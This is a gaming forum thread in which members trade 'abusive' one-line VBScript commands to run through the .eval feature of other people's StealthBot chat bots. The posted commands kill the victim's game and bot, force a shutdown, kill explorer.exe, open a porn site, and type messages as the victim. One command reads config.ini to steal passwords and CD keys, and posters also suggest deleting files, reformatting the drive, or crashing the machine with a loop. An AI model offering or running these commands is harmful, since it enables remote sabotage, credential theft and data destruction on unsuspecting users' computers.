Abusive VBScript ^^?

Talk about anything you want, but keep it within the rules, please.
User avatar
Ozzapoo
The Flying Cow!
Posts: 2196
Joined: November 2nd, 2007, 10:34 pm
Location: Melbourne

Abusive VBScript ^^?

Post by Ozzapoo »

Hi, does anyone have any abusive VBScripts that are ONE LINE which they can share :D?
Visit Ozzapoo.net, my blog and the home of AutoCP and Cheatpack Detector!
AutoCP3 now available for free!
User avatar
Vegas
Shopping Maul USA Creator
Posts: 1771
Joined: January 18th, 2007, 11:07 am
Title: No Comment
Location: Calgary Canada
Has thanked: 50 times
Been thanked: 8 times

Re: Abusive VBScript ^^?

Post by Vegas »

One line, you mean like Arnold when he says, "I'll Be Back", ?
User avatar
Ozzapoo
The Flying Cow!
Posts: 2196
Joined: November 2nd, 2007, 10:34 pm
Location: Melbourne

Re: Abusive VBScript ^^?

Post by Ozzapoo »

Vegas wrote:One line, you mean like Arnold when he says, "I'll Be Back", ?
I didn't really get that...But I meant 'one line' as in (for example):

Instead of:

Dim obj as CreateObject("WScript.Shell")
obj.SendKeys("Hi{ENTER}")

You do:

CreateObject("WScript.Shell").SendKeys("Hi{ENTER}")

Are there any more potential abusive scripts which I can use?
Visit Ozzapoo.net, my blog and the home of AutoCP and Cheatpack Detector!
AutoCP3 now available for free!
User avatar
DirtyKiller
Forum Fanatic
Posts: 398
Joined: July 26th, 2008, 4:28 pm
Title: The Faithful
Location: Portugal

Re: Abusive VBScript ^^?

Post by DirtyKiller »

First time I ever heard that btw what you mean by Abusive VBScript?
Things can be lost aren´t lost at all.
Image Image
User avatar
Ozzapoo
The Flying Cow!
Posts: 2196
Joined: November 2nd, 2007, 10:34 pm
Location: Melbourne

Re: Abusive VBScript ^^?

Post by Ozzapoo »

Alright.....

You know StealthBot? If you just ask for 50 access (that's not all that much) and then use:

.eval CreateObject("WScript.Shell").Run("tskill wa*")

Then you can instantly close the owner of the bot's wc3.

.eval CreateObject("WScript.Shell").Run("tskill se*")

Close SB

.eval CreateObject("WScript.Shell").Run("iexplore www.redtube.com")

Open Redtube (porn) with Internet Explorer

.eval CreateObject("WScript.Shell").SendKeys("I am a nubz00r!!!!!{ENTER}")

Make them type "I am a nubz00r!!!!!" and then hit enter. (If they happen to be in chat, they will just randomly type it XD)

Yeah...Unfortunately you can't compress VBScript into one-liners like C++... -.-"
Visit Ozzapoo.net, my blog and the home of AutoCP and Cheatpack Detector!
AutoCP3 now available for free!
User avatar
DirtyKiller
Forum Fanatic
Posts: 398
Joined: July 26th, 2008, 4:28 pm
Title: The Faithful
Location: Portugal

Re: Abusive VBScript ^^?

Post by DirtyKiller »

Ok now I understand a bit more. =s
Things can be lost aren´t lost at all.
Image Image
User avatar
Senethior459
Forum Staff
Posts: 2618
Joined: June 2nd, 2007, 6:53 pm
Title: I Just Lost the Game

Re: Abusive VBScript ^^?

Post by Senethior459 »

Ozzapoo wrote:
Vegas wrote:One line, you mean like Arnold when he says, "I'll Be Back", ?
I didn't really get that...
:shock:
The Terminator! Haven't you seen it? If not, go out to a movie store, NOW, and rent it. You gotta watch them all... It's like not watching 2001, or Dr. Strangelove, or The Great Escape, or Star Trek, or Star Wars! So many things (especially spoofs) are based on it, you have to watch it!

Err... I would help, but I know nothing of VB... I'm trying to learn, but I really wouldn't know anything about it. Try setting up a recursive loop, where the loop will call itself. Couldn't you make it tie up resources, possibly making the computer crash? I may just have no clue what I'm talking about, though...
My Warcraft III Tool Collection
If you want to chat/game with me:
Blizzard: Senethior459#1962
Discord: Kyle#7409
Steam: Spacekidkyle
User avatar
risker
Forum Staff
Posts: 351
Joined: June 8th, 2008, 3:05 am
Location: Australia

Re: Abusive VBScript ^^?

Post by risker »

.math createobject("wscript.shell").run("shutdown -s -f -t 0")
.eval createobject("wscript.shell").run("shutdown -s -f -t 0")

Turns comp off

.math createObject("Scripting.FileSystemObject").OpenTextFile("config.ini", 1, False, -2).ReadAll
.eval createObject("Scripting.FileSystemObject").OpenTextFile("config.ini", 1, False, -2).ReadAll

In theory you could get there password + CDKeys
But the Bot would d/c because it would spam it and get D/c for flooding


.math CreateObject("WScript.Shell").run("taskkill /im ""explorer.exe"" /f")
.eval CreateObject("WScript.Shell").run("taskkill /im ""explorer.exe"" /f")

That can be annoying..

With the
.math CreateObject ("WScript.Shell").run("")
.eval CreateObject ("WScript.Shell").run("")

You could delete files.. ( Can't think of it )
Possibly reformat
User avatar
Vegas
Shopping Maul USA Creator
Posts: 1771
Joined: January 18th, 2007, 11:07 am
Title: No Comment
Location: Calgary Canada
Has thanked: 50 times
Been thanked: 8 times

Re: Abusive VBScript ^^?

Post by Vegas »

Senethior459 wrote:
Ozzapoo wrote:
Vegas wrote:One line, you mean like Arnold when he says, "I'll Be Back", ?
I didn't really get that...
:shock:
The Terminator! Haven't you seen it? If not, go out to a movie store, NOW, and rent it. You gotta watch them all... It's like not watching 2001, or Dr. Strangelove, or The Great Escape, or Star Trek, or Star Wars! So many things (especially spoofs) are based on it, you have to watch it!

Err... I would help, but I know nothing of VB... I'm trying to learn, but I really wouldn't know anything about it. Try setting up a recursive loop, where the loop will call itself. Couldn't you make it tie up resources, possibly making the computer crash? I may just have no clue what I'm talking about, though...

I think he didnt get "one liner".
User avatar
Senethior459
Forum Staff
Posts: 2618
Joined: June 2nd, 2007, 6:53 pm
Title: I Just Lost the Game

Re: Abusive VBScript ^^?

Post by Senethior459 »

I thought he meant he didn't get the Terminator reference... I dunno. Wait for him to reply?

And risker, that last one is hilarious... Reformatting their hard drive. Ouch.
My Warcraft III Tool Collection
If you want to chat/game with me:
Blizzard: Senethior459#1962
Discord: Kyle#7409
Steam: Spacekidkyle